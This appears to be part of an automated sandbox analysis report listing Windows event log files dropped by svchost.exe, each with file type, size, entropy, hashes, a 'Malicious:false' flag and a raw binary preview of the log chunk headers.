                                                Preview:ElfChnk.................E.......H....................f.......................................................................k. ............................................=...........................................................................................................................g...............@...........................n...................M...]...........................p...............&...........&...................................................&.......................................**..0...E...........ZM.........r..&........r....6\..."(.M........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 329, DIRTY
                                                Category:dropped
                                                Size (bytes):123792
                                                Entropy (8bit):4.089957956157054
                                                Encrypted:false
                                                SSDEEP:1536:IHi6xadptrX9WP+gQHi6xadptrX9WP+g:tptrX9WP+glptrX9WP+g
                                                MD5:17BD618833710CFA993F02774FE1EE67
                                                SHA1:ED7DC7A37188C0D1BA6EB06DDFBB77758E17087D
                                                SHA-256:490EB67644FB9A2714A49624086CBC3F60138014A02C4D720AB3F94D36295E3F
                                                SHA-512:C376DA073877665F43F59C9390B5515B3F956AE5A4F2D6E08726311ED45BF0749DE8F387C7CA0D7DEBC44C43A6D7AEEAC993D287DCEBA6B96F2515D8FC47D5F3
                                                Malicious:false
                                                Preview:ElfFile.................I....................................................................................................2..ElfChnk.........J...............J...........x.........C.....................................................................sa.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.396148699263237
                                                Encrypted:false
                                                SSDEEP:384:jhONk2SCNCrN0KNoBNoiNKNosaNjN4N9NRNCN8NoNjNUNONXN6N6LNvgN1NkNWzP:jgS5itAsZ2DCIEzVFNtPp
                                                MD5:1714E9F375BF402E9FF7644ED82EC285
                                                SHA1:ECB3A4495CEBE4F270C8D94553F027A36F50C42B
                                                SHA-256:20C6A11A8C455A4E4077CC61001BED7C0DD4E6F4FAADBCAD8DDF9A31406F1051
                                                SHA-512:A376B10C14E4EF653991874DE0D730768CC8D9BD49D8C348EED40CD184DA0C2AB47022B0AF6841B0F260598927C63271550A9B2C30F6A0DB1F6A3F830FC16576
                                                Malicious:false
                                                Preview:ElfChnk.v...............v...................p.......T..q......................................................................D&................4.......................\...=...........................................................................................................................f...............?...........................m...................M...F...................}.......................}.......................&...M.......M...........................}...................m...................**......v........^.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):66960
                                                Entropy (8bit):4.276569056664267
                                                Encrypted:false
                                                SSDEEP:384:aV+VhhpVAVqVjVWVscVcVtVrV51VgVTV/VZVXKVNVjVyVlF/vVIVtVQVwVEV+VpW:Bb8xf4BsuMgku
                                                MD5:293DC750C5F94575EC83FE0AD210A9F1
                                                SHA1:B9CC6747D060865D1775BC969CB3A1BE4387D3EB
                                                SHA-256:F5EC424EF8678404DEEEC112DB706CDFBD2402124D7618CEE20980DD1438DA9C
                                                SHA-512:7C9FE2BF6E09D66C3F59288F0578AA7E0CA34F152DD54B8037334D323C230DAEB0B5B52F86E6FDA0793CD785EFB16A87DB47967E173E281C7B1266AFEE79F4F1
                                                Malicious:false
                                                Preview:ElfChnk.........G...............G....................-......................................................................N...................8.......................`...=...........................................................................................................................f...............?...........................m...................M...F....................................................'..............&.......................................................................%......**......F......./...ZM..........E!&...............................................................@.......X...a.!.....E..........@/...ZM.....`...IY..`...........F....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y.....O.p....**......G.......1...ZM..........
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):67008
                                                Entropy (8bit):4.402627845753247
                                                Encrypted:false
                                                SSDEEP:384:48hmOm7hImkmAymRvmVkcmhTiYmBmgmUmWmBmbm4my7mcEZmZmtmZ4mRmKmdm5mh:KxkrTiZz+9hZ/+7TSPnSKn
                                                MD5:D4983ED0FEA0501D7D3401BBE1515CDB
                                                SHA1:50CB5E50BDA623C01250F05CEBB1036442B6DC6E
                                                SHA-256:3763F35DAF2433CC5AF4C3328E8B2B881AC9B9312164146C22ED50845486EE51
                                                SHA-512:5D888964B302E67A65B893C6647E120CBAC36E2006E0FA261B3AEE29A316D6239F6760243CEAAEB676DF3F8405F0437D7712875B6D6917C134B15783AA38108B
                                                Malicious:false
                                                Preview:ElfChnk.....................................0........&......................................................................p...................b...........................=...........................................................................................................................f...............?...........................m...................M...F................................i...&...,...........................7..................................;...c#..{1..k:...................v..........**................o.ZM..........E!&...............................................................N.......d..._.!.....[..........@..o.ZM.....`.......`.......0........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.-.S.e.r.v.e.r.9.G?...J...]..-CM.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t.S.e.r.v.e.r./.O.p.e.r.a.t.i.o.n.a.l...e$W..R......................(.....................s.v.c.h.o.s.t...e.x.e.,.S.t.o.r.S.v.c.......r.v....**......
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.45809385281512843
                                                Encrypted:false
                                                SSDEEP:96:eNVaO8sMa3Z85ZMLgrjjIZ3Z85ZQu3Z85ZV3Z85Zu:oV7pp8nMLEvUp8nDp8nVp8n
                                                MD5:67403F43DBEA39FD58964CF1041F8131
                                                SHA1:A916F3AA4BC79FB6BAC000481F9EB57C9F0499D3
                                                SHA-256:7225E069BD47A60AA8785E06EA1396A18D27792941C349EC8D483E923FE1D9BE
                                                SHA-512:50D1F388FA4A33BE6C40DB73122E4FFB05B66BAC8F90D531A669C8163E12AD691EDEA48F39AD099B54D33E858D38497635A3750AB9F16926F94CE65C5230853C
                                                Malicious:false
                                                Preview:ElfChnk.....................................P.......GK........................................................................|.............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.248110473220085
                                                Encrypted:false
                                                SSDEEP:1536:YbBN2A4VD7VAx8whAGU2woJQghYAxgRzAlUnF9:
                                                MD5:87681F2AD6FCB19982924DCE6A2D7A27
                                                SHA1:6C4D49C5504D6DE6E63B44753C607B3362B79B57
                                                SHA-256:1CA289F8F7FD7DD1D67EDA5691EF4B083120E456204CC8F6923AFCCD700183BC
                                                SHA-512:8F1309E5DD7B017945ABF5EB7E869AA1C04A27C37DB7C3A735A2CB31D815B67643D37DAD93FB89FFF2B6BC213EAE1E55201075DAEAFA39A6B1656A214990DEBA
                                                Malicious:false
                                                Preview:ElfChnk.........]...............]...............0...........................................................................>...............................................=...................................................................................%.......................................X...............?...............................................M...F.......................................................................................>...........................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.625347651139654
                                                Encrypted:false
                                                SSDEEP:1536:+XY5nVYIyyqED5BVZUevOBtNPhPVwCRPvf:+XY5nVYIyyqED5BVZUevOBtNPhPVwChf
                                                MD5:890CA9963C766DA05E491710E1CD9D7F
                                                SHA1:3F95AB4363D5DB533E60748F69A364196BAC8920
                                                SHA-256:47523E0AC40BC366CD0A86BE9A72ECEF3A72EE7D430B25A61D8DF55341C19531
                                                SHA-512:C2D739AE5ABF76C627DA8B863CC73FF31F7C7733138DB2954A3102377FD0270F69FE269EEAE0DE4172E53E194C3B71791CD09B36F880DC726665004FD9C6A07F
                                                Malicious:false
                                                Preview:ElfChnk.........................................`....:..........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......v.......................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):91352
                                                Entropy (8bit):2.4880174975789817
                                                Encrypted:false
                                                SSDEEP:384:Qhdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorBort6ohorRorsor1orG:QDCRuZDCRuk+Y
                                                MD5:9E5479C45CC6713E78AA824BD194C7C5
                                                SHA1:ED69C694D0B3A9183ACAE76E5AE0E22EEA9CFB92
                                                SHA-256:4F3641CE42682B4F0D64154CFB92CD14D67C278F92B815BC4BDDD986071219DD
                                                SHA-512:FE6D2CCEE270527A5A125D2CE2504AF4A0E7829AD4800BF43D9CD23B49F313F67EE7EEA45457CDA7D85AEDADFD426D92061D5BFE3FEB04E81DDDA8219EF71D09
                                                Malicious:false
                                                Preview:ElfChnk.....................................hJ...L..@.."........................................................................................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................E/..............])..............................**...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:DIY-Thermocam raw data (Lepton 2.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 207715216474546355539665747968.000000
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8526226240352849
                                                Encrypted:false
                                                SSDEEP:384:YhAiPA5PNPxPEPHPhPEPmPSPRP3PoPqP7DPfPqP/P:Y2NP
                                                MD5:585F5E645713292DF375B49B2BDC28EA
                                                SHA1:42531DC7FEDA50E16705A1260EC70B5AD7015FCB
                                                SHA-256:E16C3A02C9E22074AE98621BB170E12D41A54187FCC6D53B5600F5712F37A9FF
                                                SHA-512:0C0008188EC621D5FE00CF9211729347A941AF2DE55DA3333114D83B4D181FB8792C64FA0F62309660F51FF26349684D35EAC0A4E0FE98898D1C03CAAB65B434
                                                Malicious:false
                                                Preview:ElfChnk......................................%...&...A..................................................................... p..................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8442469423268683
                                                Encrypted:false
                                                SSDEEP:384:DhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lk:DWXSYieD+tvgzmMvB2R387
                                                MD5:A12D2A18D158FA0E4EBA801B76795EAC
                                                SHA1:22C6C36D8E0ACD32735F5C0D25929CD734A2DB9F
                                                SHA-256:4A2A9FFE44AB14DE2504B3632FBDDC8EC4E3B35AFF6C5CCA75AB5095E164E39E
                                                SHA-512:729117B98F2FA8D18DD3A9B0A373EA5CD36A9B88BA54A45579DE0C50C68DABAB50096CC3078DDA1C11A7483D95CD6B39A54AF35282B1C2550F0AAE4A80F8BEA9
                                                Malicious:false
                                                Preview:ElfChnk......................................$...&.....i....................................................................x..(................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................&...............................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.195274240374291
                                                Encrypted:false
                                                SSDEEP:384:ZhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28j:ZbCyhLfI931N
                                                MD5:6728E529686A29F3C0CB24FCDAC7DE54
                                                SHA1:36F33D1B8206E3059A469A4D77DFF975B5110843
                                                SHA-256:7DEDB2248E911D89A2ABF1430005FAC9B55684A30DECC312B9CCE0F898CCDA5F
                                                SHA-512:913B017504A85CDA5406E1B30BFE6A6F767A73597F6790466248DE99E70191617E9EF8D0457CB2CCBEBB2DF71785C6C750F94BDCE254FB34B67A73E6CB6DCD81
                                                Malicious:false
                                                Preview:ElfChnk.........N...............N...................Mo-.........................................................................................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n.......6t..............................................................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.3895763915665986
                                                Encrypted:false
                                                SSDEEP:768:TcMhFBuyKskZljdoKXjtT/r18rQXn8uwgSj70FTP:gMhFBuV80
                                                MD5:1D8BE61A76EB65AD20811E2A3EBD8D8B
                                                SHA1:65BCCD165D3CF1461160CB66C599C27292F5CFAE
                                                SHA-256:3A422D3D5B358379363C1C04D81DDC636AB1EE1E1B9ACC78C43CF02BDCD438CD
                                                SHA-512:2150FFB459D6F9B9AC6DE5274E96C59803240F3C6CFD820C565B892B10FD7DF152B223D05A01433A15DB737C688D4451DD78B07BB42F9774C18CC64E48D23FC4
                                                Malicious:false
                                                Preview:ElfChnk.........O...............O...........0........~......................................................................O.".................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.900849391492108
                                                Encrypted:false
                                                SSDEEP:768:wtvigANk0vAzBCBao/F6Cf2SEqEhwaK41HZalMIq9Iz6IOTLGfFXN/E:KDH+dqWzrhFXN/E
                                                MD5:C5C67E971469A08768EEAA50D6CDFA80
                                                SHA1:BE7F82BB386B57D8133754BF50EC601B5F03B359
                                                SHA-256:5FCC096B23E96EEAF2E15980158ED235A11EC2D0EF3DE416CA22BBD108D20B71
                                                SHA-512:D72044FA5A8CA1D3DF8C7F1EE7D1ABAEB0DFFB1A4A6C644176088AF387E611D7A88467F7C338895D1467324B977DC39A5870A9269E6F66AB22F7662CB17FF2E5
                                                Malicious:false
                                                Preview:ElfChnk.w...............w............................`........................................................................?.................4.......................\...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..H...w...........`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 27, DIRTY
                                                Category:dropped
                                                Size (bytes):93416
                                                Entropy (8bit):2.772166390025152
                                                Encrypted:false
                                                SSDEEP:384:2Oh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzc:5MAP1Qa5AgfQQhCdMAP1Qa5AgfQQhC
                                                MD5:55802A9A8269B88E9ED14075334BD345
                                                SHA1:99D04229177792BA4E1ADFB6BF146718B0692B40
                                                SHA-256:9E83D44A9EE02BC1C778743D73CB022F3C7354ED3A4AF0C795F98047134C5CDF
                                                SHA-512:ECF26715F0FF8A0A597A376BA4AD4385B3910D1E4647101B7451CCFCB9B13814292117513BFB03667654B8041C29D49063FF2B1EDAD7627D2CE015BD5714FBAE
                                                Malicious:false
                                                Preview:ElfFile.....................................................................................................................|.~2ElfChnk.....................................hi..hl..N=.,.....................................................................P.B................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........Y...............................&..............;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.441475404183629
                                                Encrypted:false
                                                SSDEEP:768:ZbM5eahvB94LSAoiMTQMrj+/IVvu4mJY0YCOO:dMAaZBLzn6fYZO
                                                MD5:B7F318BB9FA336235CCBE5A391775D8E
                                                SHA1:F7F7CFF57A6BB00B4E6F17E39BAAF2443E08878D
                                                SHA-256:D59515423F15D3618746447E1333945BF1432B9B4C20B54849050CE17C72311D
                                                SHA-512:1C8FA8FD31BC4A3C6815A473C00187497E7E71CAF1FAD61F5A6D73DBEB6AE9D551A3DAA6B39B76A4D1401A061844036D5D06469A3942BC030B276D4E186C7289
                                                Malicious:false
                                                Preview:ElfChnk.r...............r...................0.......A..@....................................................................k...................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F....................+...............)......55......................&.......E....@......M#..............u7.......1.........../...........!..]>......**......r.......R...`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:DIY-Thermocam raw data (Lepton 3.x), scale 8448-4108, spot sensor temperature 0.000000, unit celsius, color scheme 1, show spot sensor, calibration: offset 0.000000, slope 308596736.000000
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.4699263306571524
                                                Encrypted:false
                                                SSDEEP:384:6hYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Klq:61T4hu7OJscMmza
                                                MD5:86173450A7EE15BC5B6A2C667DD3B040
                                                SHA1:200635B7FB3137AB9A33A6551182F4BA05BDCE84
                                                SHA-256:AEDE5AAE515D2A3C78BA23C631D178DCCB3E775CD3B4FB6F0406887FAEDE5B88
                                                SHA-512:3A73438F1A7B3B2F166B2B2F70E713F7393A2F2D5DF23858D05F2790BD2DF5B2CDC38263EC72ECC34621C82C44308E3C0474E295C678642E30146CAC27D69067
                                                Malicious:false
                                                Preview:ElfChnk.........s...............s..............x....,........................................................................5.................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.450965793914843
                                                Encrypted:false
                                                SSDEEP:384:phFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDfO:pzSKEqsMuy6CL3
                                                MD5:3914FD52494E203A25B69F9F4221031F
                                                SHA1:8046E0D1C78A47632A4550AC66FC9917E6429457
                                                SHA-256:D2D37391EC1325C6C27486311C5B5E1D11C55D0A464270F009E3D3E1B2A54D3B
                                                SHA-512:12FB89D2F9A5B19C7150D23A09A7C7B3F5616C09C8A83AE83A331263F0FA45181066F1A44080A46FE3A9F551BDF56485BD03DB9001FE82388DCDB1EF3FBC7829
                                                Malicious:false
                                                Preview:ElfChnk.........L...............L...................=....................................................................... ..H................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................`..............................................................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.1568075545974956
                                                Encrypted:false
                                                SSDEEP:384:ZhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zg:Zmw9g3LCjg
                                                MD5:F3CF496665845DA6C957242770973ECE
                                                SHA1:BF7206ECD6C6ABE687BE10A157C86C7EBE59C6BD
                                                SHA-256:BB190FF3FA391F3B69F3E4509B14D6DE320C980D69A59BC74DBD57BD8AA42F7F
                                                SHA-512:EA5A2D21353556B5B6FC420671E5F7026B6A280C7CD740CD1CAFA2C958318B5BB6A5F4AE6A00450E2A7997425A0AAAFFD158452401ABB732CA985A8DE3548213
                                                Malicious:false
                                                Preview:ElfChnk.........6...............6...........(o...p..........................................................................y.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n........X..............................................................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.8853799397148268
                                                Encrypted:false
                                                SSDEEP:384:5hCI2LwuSsYI8tIbLIYoI/IE6IQsIhIxIUIfIXIAI2I/IRIvI:5Z
                                                MD5:FACBCFA717058EFCED1754221D6A421D
                                                SHA1:1BA10B3E2BB8A2C739257CE228789E2D6C4F1A1D
                                                SHA-256:6F6A7779828D79A41F94AF9EE452BB44EE0E495D27A5B5DE7DAD659A6865C9CB
                                                SHA-512:0253FDCC88D3E52A9A26A065AC0C4E264DC0E84CB6A175D09BEC79E56D5282B9B95DCE2FEF47C48505D34C629388904AA6E2BDFF81759920FE314D6F9F5A6DB0
                                                Malicious:false
                                                Preview:ElfChnk.K.......L.......K.......L...............@6..u..B.....................................................................w..................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**......K.......1E..`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
